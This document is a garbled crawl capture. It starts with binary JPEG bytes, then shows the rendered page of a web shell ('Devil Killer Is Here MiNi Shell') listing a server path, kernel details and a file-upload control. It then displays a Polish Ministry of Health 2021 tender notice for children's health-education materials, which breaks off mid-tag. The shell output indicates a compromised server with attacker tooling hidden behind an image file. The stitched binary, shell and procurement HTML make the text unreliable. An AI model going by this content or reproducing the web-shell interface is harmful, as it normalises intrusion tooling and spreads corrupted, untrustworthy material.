JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210318/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210318/0001982101-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00019821 z dnia 2021-03-18</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> PRZYGOTOWANIE I OPRACOWANIE MATERIAŁÓW PROMOCYJNYCH I EDUKACYJNYCH W RAMACH PROJEKTU PREDEFINIOWANEGO NR 2, PN. „ZDROWY STYL ŻYCIA DZIECI I MŁODZIEŻY” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Ministerstwo Zdrowia</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000287987</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Miodowa 15</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-952</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowieniapubliczne@mz.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://zamowienia-mz.ezamawiajacy.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> PRZYGOTOWANIE I OPRACOWANIE MATERIAŁÓW PROMOCYJNYCH I EDUKACYJNYCH W RAMACH PROJEKTU PREDEFINIOWANEGO NR 2, PN. „ZDROWY STYL ŻYCIA DZIECI I MŁODZIEŻY” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4e1edbf5-8646-11eb-86b1-a64936a8669f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00019821</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-03-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00007434/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">2.3.1 Działania edukacyjno-informacyjno-promocyjne</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Norweskiego Mechanizmu Finansowego 2014-2021 w ramach Programu pn. „Zdrowie”. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zamowienia-mz.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zamowienia-mz.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Postępowanie prowadzone jest na Platformie pod adresem https://zamowienia-mz.ezamawiajacy.pl. Przeglądanie i pobieranie treści dokumentacji postępowania nie wymaga posiadania konta na Platformie ani logowania do Platformy.Wykonawca przystępując do postępowania o udzielenie zamówienia publicznego, tj. bezpłatnie rejestrując się lub logując, w przypadku posiadania konta w Platformie, akceptuje warunki korzystania z Platformy.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Ochrona danych osobowych - RODOZgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016 oraz Dz. Urz. UE L 127 z 23.05.2018, str. 2), dalej „RODO”, informuję, że:1)	Wykonawcy będącego osobą fizyczną,2)	Wykonawcy będącego osobą fizyczną, prowadzącą jednoosobową działalność gospodarczą,3)	pełnomocnika Wykonawcy będącego osobą fizyczną (np. dane osobowe zamieszczone w pełnomocnictwie),4)	członka organu zarządzającego Wykonawcy, będącego osobą fizyczną (np. dane osobowe zamieszczone w informacji z KRK),5)	osoby fizycznej skierowanej do przygotowania i przeprowadzenia postępowania o udzielenie zamówienia publicznego lub do kontaktów sprawie realizacji zamówienia; informuję, że:a)	administratorem Pani/Pana danych osobowych jest Minister Zdrowia, Ministerstwo Zdrowia, ul. Miodowa 15, 00-952 Warszawa;b)	z Inspektorem Ochrony Danych w Ministerstwie Zdrowia może Pani/Pan skontaktować się za pośrednictwem poczty elektronicznej przez adres e-mail: iod@mz.gov.pl;c)	Pani/Pana dane osobowe przetwarzane będą w celu związanym z przeprowadzeniem niniejszego postępowania, na podstawie art. 6 ust. 1 lit. c RODO;d)	odbiorcą Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 Ustawy PZP;e)	Pani/Pana dane osobowe będą przechowywane zgodnie z art. 78 ust. 1 Ustawy PZP, przez okres 4 lat licząc od końca roku kalendarzowego, w którym zakończono postępowanie o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata licząc od końca roku kalendarzowego, w którym zakończono postępowanie o udzielenie zamówienia, okres przechowywania obejmuje cały czas trwania umowy;f)	posiada Pani/Pan prawo dostępu do treści swoich danych oraz prawo ich sprostowania, usunięcia, ograniczenia przetwarzania, prawo do przenoszenia danych, prawo wniesienia sprzeciwu, prawo do cofnięcia zgody w dowolnym momencie bez wpływu na zgodność z prawem przetwarzania (jeżeli przetwarzanie odbywa się na podstawie zgody), którego dokonano na podstawie zgody przed jej cofnięciem;g)	ma Pani/Pan prawo wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, iż przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;h)	Pani/Pana dane będą przetwarzane w sposób zautomatyzowany, w tym również w formie profilowania.i)	nie przysługuje Pani/Panu:	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych,	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przygotowanie i opracowanie materiałów promocyjnych w ramach projektu predefiniowanego nr 2 pn. „Zdrowy styl życia dzieci i młodzieży”, finansowanego z Norweskiego Mechanizmu Finansowego 2014-2021 w ramach programu pn. „ZDROWIE”:cześć I- Moduł nr 1 Odżywianie i sport - przygotowanie i ocena programu szkoleniowego dotyczącego wyboru zdrowych opcji w przedszkolach i żłobkach oraz opracowanie materiałów promocyjnych i edukacyjnych, </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79341400-0 - Usługi prowadzenia kampanii reklamowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">84 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Cena oferty brutto w PLN - C - 30 pkt A.	Ekspert odpowiedzialny za przygotowanie i ocenę programu szkoleniowego dotyczącego zdrowych opcji w przedszkolach i żłobkach 1. Posiada stopień naukowy w obszarze nauk o żywieniu lub nauk o zdrowiu – max 7 pkt a)	Stopień naukowy doktora w obszarze nauk o żywieniu lub nauk o zdrowiu – 5 pkt b)	Tytuł naukowy profesora w obszarze nauk o żywieniu lub nauk o zdrowiu – 7 pkt 3. Posiada dodatkowe doświadczenie zawodowe (większe niż 5 lat) w obszarze prawidłowego żywienia – max 7 pkt a)	6 lat doświadczenia – 2 pkt b)	7 lat doświadczenia – 3 pkt c)	8 lat doświadczenia – 4 pkt d)	9 lat doświadczenia – 5 pkt e)	10 lat doświadczenia – 6 pkt f)	11 lat doświadczenia i więcej – 7 pkt 4.Posiada dodatkowe doświadczenie (brał/bierze udział) w organizacji (więcej niż 30 godzin) warsztatów dla dzieci w zakresie zdrowego żywienia – max 7 pkt a)	40 godzin warsztatów – 3 pkt b)	50 godzin warsztatów – 5 pkt c)	60 godzin warsztatów i więcej – 7 pkt 5. Posiada dodatkowe doświadczenie w zakresie opracowania analogicznych programów szkoleniowych/scenariuszy zajęć dydaktyczno-warsztatowych, tzn. jest autorem lub współautorem więcej niż 3 programów/scenariuszy dotyczących zdrowego żywienia dla dzieci w żłobkach i przedszkolach – max 7 pkt a)	4 programy/scenariusze - 4 pkt b)	5 programów/scenariuszy – 5 pkt c)	6 programów/scenariuszy - 6 pkt d)	7 programów/scenariuszy i więcej- 7 pkt 6.Posiada znajomość języka angielskiego na poziomie wyższym niż B2 – max 7 pkt a)	Tak – 7 pkt b)	Nie – 0 pkt B.	Ekspert odpowiedzialny za opracowanie treści materiałów edukacyjnych i promocyjnych 1.Posiada stopień naukowy w obszarze nauk o żywieniu lub nauk o zdrowiu – max 7 pkt a)	Stopień naukowy doktora w obszarze nauk o żywieniu lub nauk o zdrowiu – 5 pkt b)	Tytuł naukowy profesora w obszarze nauk o żywieniu lub nauk o zdrowiu – 7 pkt 2.Posiada dodatkowe doświadczenie zawodowe (większe niż 5 lat) w obszarze prawidłowego żywienia – max 7 pkt a) 6 lat doświadczenia – 2 pkt b)	7 lat doświadczenia – 3 pkt c)	8 lat doświadczenia – 4 pkt d)	9 lat doświadczenia – 5 pkt e)	10 lat doświadczenia – 6 pkt f)	11 lat doświadczenia i więcej – 7 pkt 3.Posiada dodatkowe doświadczenie (brał/bierze udział) w organizacji (więcej niż 30 godzin) warsztatów dla dzieci w zakresie zdrowego żywienia – max 7 pkt a)	40 godzin warsztatów – 3 pkt b)	50 godzin warsztatów – 5 pkt c)	60 godzin warsztatów i więcej – 7 pkt 4.Posiada dodatkowe doświadczenie w zakresie opracowania analogicznych programów szkoleniowych/scenariuszy zajęć dydaktyczno-warsztatowych, tzn. jest autorem lub współautorem więcej niż 3programów/scenariuszy dotyczących zdrowego żywienia dla dzieci w żłobkach i przedszkolach – max 7 pkt a)	4 programy/scenariusze - 4 pkt b)	5 programów/scenariuszy – 5 pkt c)	6 programów/scenariuszy- 6 pkt d)	7 programów/scenariuszy i więcej - 7 pkt 5.Posiada znajomość języka angielskiego na poziomie wyższym niż B2 – max 7 pkt a)	Tak – 7 pkt b)	Nie – 0 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie ekspertów</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> 1.	Cena oferty brutto w PLN - C - 30 pkt A.	Ekspert odpowiedzialny za przygotowanie i ocenę programu szkoleniowego dotyczącego zdrowych opcji w przedszkolach i żłobkach 1. Posiada stopień naukowy w obszarze nauk o żywieniu lub nauk o zdrowiu – max 7 pkt a)	Stopień naukowy doktora w obszarze nauk o żywieniu lub nauk o zdrowiu – 5 pkt b)	Tytuł naukowy profesora w obszarze nauk o żywieniu lub nauk o zdrowiu – 7 pkt 3. Posiada dodatkowe doświadczenie zawodowe (większe niż 5 lat) w obszarze prawidłowego żywienia – max 7 pkt a)	6 lat doświadczenia – 2 pkt b)	7 lat doświadczenia – 3 pkt c)	8 lat doświadczenia – 4 pkt d)	9 lat doświadczenia – 5 pkt e)	10 lat doświadczenia – 6 pkt f)	11 lat doświadczenia i więcej – 7 pkt 4.Posiada dodatkowe doświadczenie (brał/bierze udział) w organizacji (więcej niż 30 godzin) warsztatów dla dzieci w zakresie zdrowego żywienia – max 7 pkt a)	40 godzin warsztatów – 3 pkt b)	50 godzin warsztatów – 5 pkt c)	60 godzin warsztatów i więcej – 7 pkt 5. Posiada dodatkowe doświadczenie w zakresie opracowania analogicznych programów szkoleniowych/scenariuszy zajęć dydaktyczno-warsztatowych, tzn. jest autorem lub współautorem więcej niż 3 programów/scenariuszy dotyczących zdrowego żywienia dla dzieci w żłobkach i przedszkolach – max 7 pkt a)	4 programy/scenariusze - 4 pkt b)	5 programów/scenariuszy – 5 pkt c)	6 programów/scenariuszy - 6 pkt d)	7 programów/scenariuszy i więcej- 7 pkt 6.Posiada znajomość języka angielskiego na poziomie wyższym niż B2 – max 7 pkt a)	Tak – 7 pkt b)	Nie – 0 pkt B.	Ekspert odpowiedzialny za opracowanie treści materiałów edukacyjnych i promocyjnych 1.Posiada stopień naukowy w obszarze nauk o żywieniu lub nauk o zdrowiu – max 7 pkt a)	Stopień naukowy doktora w obszarze nauk o żywieniu lub nauk o zdrowiu – 5 pkt b)	Tytuł naukowy profesora w obszarze nauk o żywieniu lub nauk o zdrowiu – 7 pkt 2.Posiada dodatkowe doświadczenie zawodowe (większe niż 5 lat) w obszarze prawidłowego żywienia – max 7 pkt a) 6 lat doświadczenia – 2 pkt b)	7 lat doświadczenia – 3 pkt c)	8 lat doświadczenia – 4 pkt d)	9 lat doświadczenia – 5 pkt e)	10 lat doświadczenia – 6 pkt f)	11 lat doświadczenia i więcej – 7 pkt 3.Posiada dodatkowe doświadczenie (brał/bierze udział) w organizacji (więcej niż 30 godzin) warsztatów dla dzieci w zakresie zdrowego żywienia – max 7 pkt a)	40 godzin warsztatów – 3 pkt b)	50 godzin warsztatów – 5 pkt c)	60 godzin warsztatów i więcej – 7 pkt 4.Posiada dodatkowe doświadczenie w zakresie opracowania analogicznych programów szkoleniowych/scenariuszy zajęć dydaktyczno-warsztatowych, tzn. jest autorem lub współautorem więcej niż 3programów/scenariuszy dotyczących zdrowego żywienia dla dzieci w żłobkach i przedszkolach – max 7 pkt a)	4 programy/scenariusze - 4 pkt b)	5 programów/scenariuszy – 5 pkt c)	6 programów/scenariuszy- 6 pkt d)	7 programów/scenariuszy i więcej - 7 pkt 5.Posiada znajomość języka angielskiego na poziomie wyższym niż B2 – max 7 pkt a)	Tak – 7 pkt b)	Nie – 0 pkt <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przygotowanie i opracowanie materiałów promocyjnych w ramach projektu predefiniowanego nr 2 pn. „Zdrowy styl życia dzieci i młodzieży”, finansowanego z Norweskiego Mechanizmu Finansowego 2014-2021 w ramach programu pn. „ZDROWIE”:część II- Moduł nr 2 Używanie substancji nikotynowych - przygotowanie i opracowanie materiałów promocyjnych i edukacyjnych skierowanych do młodzieży na temat zapobiegania używaniu substancji tytoniowych, </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79341400-0 - Usługi prowadzenia kampanii reklamowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.Cena oferty brutto w PLN - C	30 pkt 2. Posiada wykształcenie medyczne i co najmniej stopieńnaukowy doktora habilitowanego – maksymalnie 10 pkt a)	Stopień naukowy doktora habilitowanego – 5 pkt b)	Tytuł naukowy profesora – 10 pkt 3. Posiada dodatkowe doświadczenie zawodowe (większe niż 2 lata) w pracy na stanowisku naukowym lub naukowo - dydaktycznym w uczelni wyższej lub instytucie prowadzącym działalność dydaktyczną – maksymalnie 10 pkt a)	3 lata doświadczenia – 5 pkt b)	4 lata doświadczenia – 6 pkt c)	5 lat doświadczenia – 7 pkt d)	6 lat doświadczenia – 8 pkt e)	7 lat doświadczenia – 9 pkt f)	8 lat doświadczenia i więcej – 10 pkt 4. Jest członkiem towarzystw naukowych (więcej niż 2) zajmujących się problematyką palenia tytoniu i chorób odtytoniowych – maksymalnie 15 pkt a)	3 towarzystw - 10 pkt b)	4 towarzystw -11 pkt c)	5 towarzystw - 12 pkt d)	6 towarzystw - 13 pkt e)	7 towarzystw - 14 pkt f)	8 towarzystw i więcej - 15 pkt 5. Posiada dodatkową udokumentowaną działalność naukową w zakresie palenia tytoniu tzn. jest autorem lub współautorem (więcej niż 5) publikacji poświęconych tej problematyce opublikowanych w ciągu ostatnich 5 lat – maksymalnie 10 pkt a)	6 publikacji - 6 pkt b)	7 publikacji - 7 pkt c)	8 publikacji - 8 pkt d)	9 publikacji - 9 pkt e)	10 publikacji i więcej- 10 pkt 6.Posiada dodatkową udokumentowaną działalność naukową w zakresie elektronicznych systemów dostarczających nikotynę oraz nowatorskich wyrobów tytoniowych tzn. jest autorem lub współautorem (więcej niż 5) publikacji poświęconych tej problematyce opublikowanych w ciągu ostatnich 5 lat – maksymalnie 15 pkt a)	6 publikacji - 11 pkt b)	7 publikacji - 12 pkt c)	8 publikacji - 13 pkt d)	9 publikacji - 14 pkt e)	10 publikacji i więcej - 15 pkt 7.Posiada dodatkowe udokumentowane doświadczenie w realizacji (więcej niż 2) projektów badawczych dotyczących palenia tytoniu, w tym międzynarodowych badań epidemiologicznych nad paleniem tytoniu – maksymalnie 5 pkt a)	3 projekty - 3 pkt b)	4 projekty - 4 pkt c)	5 projektów i więcej - 5 pkt 8.Posiada dodatkowe udokumentowane doświadczenie we współpracy międzynarodowej (udział w więcej niż 2 wydarzeniach) w zakresie projektowania polityki antytytoniowej (konferencje naukowe, staże, szkolenia) – maksymalnie 5 pkt a)	3 wydarzenia - 3 pkt b)	4 wydarzenia - 4 pkt c)	5 wydarzeń i więcej - 5 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 